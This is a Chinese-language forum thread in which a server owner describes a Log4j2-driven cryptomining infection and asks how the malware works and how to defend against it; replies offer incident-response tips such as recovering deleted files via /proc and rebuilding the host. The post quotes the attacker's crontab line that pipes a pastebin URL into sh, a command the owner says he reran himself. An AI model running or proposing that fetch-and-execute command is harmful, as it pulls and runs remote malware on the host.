服务器被挖矿,找到相关文件及计划任务, google 过关键词得知是 Log4j2 漏洞导致被入侵,想知道该病毒运行的逻辑,找不到相关 sh 文件,求大佬指点。
callmebigfaceman · 2022-04-06 17:07:22 +08:00 · 3507 次点击这是一个创建于 953 天前的主题,其中的信息可能已经有所发展或是发生改变。
环境介绍: 1 、redhat 6.3 2 、对外开启了 9000:80 端口的映射 3 、强密码验证(限制指定 IP 通过 ssh 连接)
已知信息: 1 、crontab -l 得知被添加了计划任务:curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh (我尝试得到该脚本,但是请求出来只是字符串‘#endif’,我该如何得到该病毒脚本? top 查看进程时候有看到 /tmp/.mimu/apache.sh ,但是实际去查看该病毒目录,并没有发现脚本,是否加载在内存中,实际脚本已被删除?) https://imgur.com/Huflmd7 https://imgur.com/2PZNjXR
2 、已知该脚本会生成隐藏目录 /tmp/.mimu/,下面包含挖矿程序 kthmimu 及配置文件 config.json https://imgur.com/Huflmd7
已自行尝试复现的测试: 1 、尝试 curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh ,但是我并没有发现脚本文件及复现
求助: 1 、如何找出该脚本及实现逻辑? 2 、如何防范?
 |
1
aaa5838769 2022-04-06 17:14:42 +08:00
你的项目是在宿主机运行还是容器内,如果是在容器内,去容器的目录下看看。
|
 |
2
callmebigfaceman OP @aaa5838769 宿主机内
|
 |
3
Jinnyu 2022-04-06 17:34:35 +08:00
看样子应该是 https://pastebin.com/raw/8DdBvkRn 被访问后, 服务端删除了里边的内容,
防止脚本内容泄露 可以分析下 apache.sh 的脚本内容 看看都连接了哪些端口 1. 先禁止下端口访问 2. 通过 chattr 修改文件权限, 禁止写入 /tmp/.mimu 3. 复查所有常用二进制文件 MD5 (cd, mv, cp, ps, ls, top 等) |
 |
4
polaa 2022-04-06 17:56:49 +08:00
1.检测是否存在自启动脚本
2. 尝试恢复删除的脚本 关键词 recover deleted file active process recover deleted file |
 |
5
defunct9 2022-04-06 18:03:05 +08:00
保护现场不够啊。
|
|
6
defunct9 2022-04-06 18:03:16 +08:00  6
开 ssh ,让我上去看看
|
 |
7
meetcw 2022-04-06 18:35:41 +08:00
进程没关掉的话可以通过 proc/{pid}/exe 文件恢复执行文件,另外 proc/{pid}/fd 下是这个进程打开的文件。
|
 |
8
wd 2022-04-06 19:19:44 +08:00 via iPhone
别折腾了,遇到这样的一般就重建吧,你不知道对方埋了多少后门的。
|
 |
9
idragonet 2022-04-06 20:32:52 +08:00
今晚我的腾讯云服务器也收到服务器被挖矿警告了。
|
|
10
callmebigfaceman OP @Jinnyu 1 、2 都已做了,我仔细查查 3 ,感谢
|
|
11
callmebigfaceman OP @polaa 1.已检查自启动的相关项目 2.我尝试一下,感谢
|
|
12
callmebigfaceman OP @defunct9 现场已经被我清理过了,不是很方便提供 ssh ,不好意思。
|
|
13
callmebigfaceman OP @meetcw 被我关了,exe 是 /bin/sh
|
|
14
callmebigfaceman OP @wd 主要想了解它如何实现的
|
Select Language